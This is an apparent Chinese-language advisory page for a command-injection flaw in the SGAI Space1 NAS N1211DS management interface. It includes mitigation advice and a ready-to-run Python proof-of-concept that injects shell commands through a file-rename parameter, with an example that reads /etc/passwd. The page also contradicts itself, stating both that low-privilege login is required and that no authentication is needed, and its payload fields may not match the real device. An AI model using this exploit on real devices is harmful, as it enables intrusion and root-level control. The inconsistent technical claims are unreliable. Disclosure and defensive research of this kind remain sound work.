CVE-2025-14184: SGAI Space1 NAS N1211DS 命令执行漏洞

漏洞信息

漏洞编号

CVE-2025-14184

漏洞类型

命令执行

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

SGAI Space1 NAS N1211DS

漏洞概述

CVE-2025-14184是影响SGAI Space1 NAS N1211DS设备的一个中等严重性命令执行漏洞。该漏洞存在于设备的Web管理界面CGI组件中，具体位于/cgi-bin/JSONAPI端点的gsaiagent服务中。攻击者可以通过操纵RENAME_FILE、OPERATE_FILE和NGNIX_UPLOAD等功能参数，在底层系统上执行任意命令。由于该漏洞利用无需高权限认证（只需低权限用户），且无需用户交互即可发起攻击，因此具有较高的实际利用价值。漏洞已于2025年12月7日公开披露，厂商在收到早期通知后未作出任何回应，导致漏洞长时间处于未修复状态。建议使用该设备的用户立即采取临时缓解措施，并持续关注厂商更新。

技术细节

该命令执行漏洞源于SGAI Space1 NAS N1211DS设备的Web管理接口对用户输入缺乏有效过滤。在/cgi-bin/JSONAPI端点中，gsaiagent组件处理RENAME_FILE、OPERATE_FILE和NGNIX_UPLOAD等文件操作请求时，直接将用户可控的参数传递给系统命令执行函数而未进行安全校验。攻击者可通过构造恶意参数，利用分号、管道符或反引号等命令连接符注入额外系统命令。由于设备默认以高权限运行CGI进程，注入的命令将以root权限执行，实现完全的系统控制。攻击向量为网络层，CVSS评分6.3（中等），攻击复杂度低，无需认证或用户交互即可利用。

攻击链分析

STEP 1

信息收集

攻击者扫描目标网络，发现运行SGAI Space1 NAS N1211DS的设备，并识别Web管理界面可访问

STEP 2

认证获取

攻击者使用低权限账户登录设备（如使用默认凭证或已泄露的凭据）

STEP 3

构造恶意请求

攻击者构造包含命令注入payload的HTTP POST请求到/cgi-bin/JSONAPI端点，利用RENAME_FILE/OPERATE_FILE/NGNIX_UPLOAD功能

STEP 4

命令执行

payload通过未过滤的参数传递给系统命令执行函数，攻击者在目标系统上以root权限执行任意命令

STEP 5

持久化控制

攻击者可能部署后门、修改配置或窃取数据以实现长期访问和数据外泄

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
# CVE-2025-14184 PoC - SGAI Space1 NAS Command Execution
# Target: SGAI Space1 NAS N1211DS up to version 1.0.915

import requests
import sys

def exploit_cve_2025_14184(target_url, cmd="id"):
    """
    Exploit command execution via JSONAPI endpoint
    Target: /cgi-bin/JSONAPI
    Vulnerable functions: RENAME_FILE, OPERATE_FILE, NGNIX_UPLOAD
    """
    # Construct malicious payload for RENAME_FILE function
    payload = {
        "action": "RENAME_FILE",
        "filename": f"test.txt;{cmd}",
        "new_filename": "test2.txt"
    }
    
    # Alternative payload using OPERATE_FILE
    # payload = {
    #     "action": "OPERATE_FILE",
    #     "filepath": f"';{cmd};'",
    #     "operation": "delete"
    # }
    
    # Alternative payload using NGNIX_UPLOAD
    # payload = {
    #     "action": "NGNIX_UPLOAD",
    #     "filename": f"';{cmd};'",
    #     "filepath": "/tmp"
    # }
    
    try:
        response = requests.post(
            f"{target_url}/cgi-bin/JSONAPI",
            json=payload,
            timeout=10
        )
        return response.text
    except requests.exceptions.RequestException as e:
        return f"Error: {str(e)}"

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: {sys.argv[0]} <target_url> [command]")
        print(f"Example: {sys.argv[0]} http://192.168.1.100 'cat /etc/passwd'")
        sys.exit(1)
    
    target = sys.argv[1]
    command = sys.argv[2] if len(sys.argv) > 2 else "id"
    
    result = exploit_cve_2025_14184(target, command)
    print(f"Command output:\n{result}")

影响范围

SGAI Space1 NAS N1211DS < 1.0.915

SGAI Space1 NAS N1211DS up to 1.0.915

防御指南

临时缓解措施

由于厂商未回应漏洞披露，建议采取以下临时缓解措施：1) 在网络边界设备（如防火墙）上限制对NAS设备Web管理界面的访问，仅允许受信任的IP地址访问；2) 禁用或限制/cgi-bin/JSONAPI端点的公开访问；3) 定期检查设备日志，监控是否存在异常的RENAME_FILE、OPERATE_FILE或NGNIX_UPLOAD请求；4) 使用强密码并定期更换，避免使用默认凭证；5) 如业务允许，暂时关闭NAS的文件管理API功能；6) 考虑部署入侵检测系统监控相关攻击特征。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-14184
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-14184
3 Details https://www.cvedetails.com/cve/CVE-2025-14184/
4 VulDB https://vuldb.com/cve/CVE-2025-14184
5 Link https://vuldb.com/?ctiid.334604
6 Link https://vuldb.com/?id.334604
7 Link https://vuldb.com/?submit.698568
8 Link https://vuldb.com/?submit.698569
9 Link https://vuldb.com/?submit.698570
10 Link https://www.notion.so/2b16cf4e528a80858abbf62b721a54b0
11 Link https://www.notion.so/2b16cf4e528a80f2ada9dc83651a4013